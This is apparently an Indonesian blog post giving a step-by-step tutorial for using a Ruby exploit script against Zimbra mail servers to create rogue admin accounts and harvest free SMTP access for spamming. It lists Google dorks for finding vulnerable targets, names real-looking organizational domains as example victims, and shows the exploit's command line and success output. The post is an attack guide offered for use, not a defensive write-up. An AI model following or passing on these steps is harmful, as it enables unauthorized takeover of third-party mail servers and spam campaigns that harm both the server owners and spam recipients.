Selamat malam semua, :D saya akan membagi tutorial bagaimana mencari SMTP gretongan dengan 0day exploit :D
Pastinya sangan bergunna untuk method spam :v oke masuk aja ke topik :D
Download Tools nya :
Ruby22 Installer
Zimbra Exploit
Langkah Installasi dan cara exploit di cmd :
- Instal ruby samapai selesai di program files c:\
- Download Script Exploit nya
- Setalah di download Extrax Scipt Exploit nya di file Ruby nya tadi
- Extrax di file Ruby di folder Bin
- Buka cmd
- Jalan kan perintah nya
- "cd c:\ruby\bin" *tanpakutip ( di bagian garis miring itu sesuaikan di mana kamu menyimpan Ruby nya tadi di mana
- ruby run.rb -t http://www.target.com
Untuk mencari target butuh dork zimbra, saya hanya ngasih 4 dork
inurl:"web client zimbra login"
inurl:"powered by zimbra"
inurl:"zimbra login"
inurl:"zimbra mail"Untuk dork lain silahkan mencari dan mengembangkan dork sendiri
Langkah mencari target :
- Buka google.com
- Masukkan dork diatas tadi kedalam google
- Contoh : mail.kereta-api.co.id
ambil website domainnya saja, webmail.iain-surakarta.ac.id - Copy dan Paste di cmd yang tadi sudah diberi perintah,
c:/ruby/bin>ruby run.rb -t mail.kereta-api.co.id -u [username] -p [password] - Kemudian liat hasilnya
Jika sukses ada notice sepeti ini di cmd
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
Login : mail.kereta-api.co.id/zimbraAdmin/
Username : [username]
Password : [password]
Keterangan ComandLine :
=========================================
-t = command ini Set target attack [korban]
-u = command ini Set username [anda]
-p = command ini Set password [anda]
==========================================
Sekian yang dapat saya paparkan pada Malam ini selebihnya Tunggu update berikutnya :D
Wassalamualaikum wr.wb
Posts
0 komentar:
Post a Comment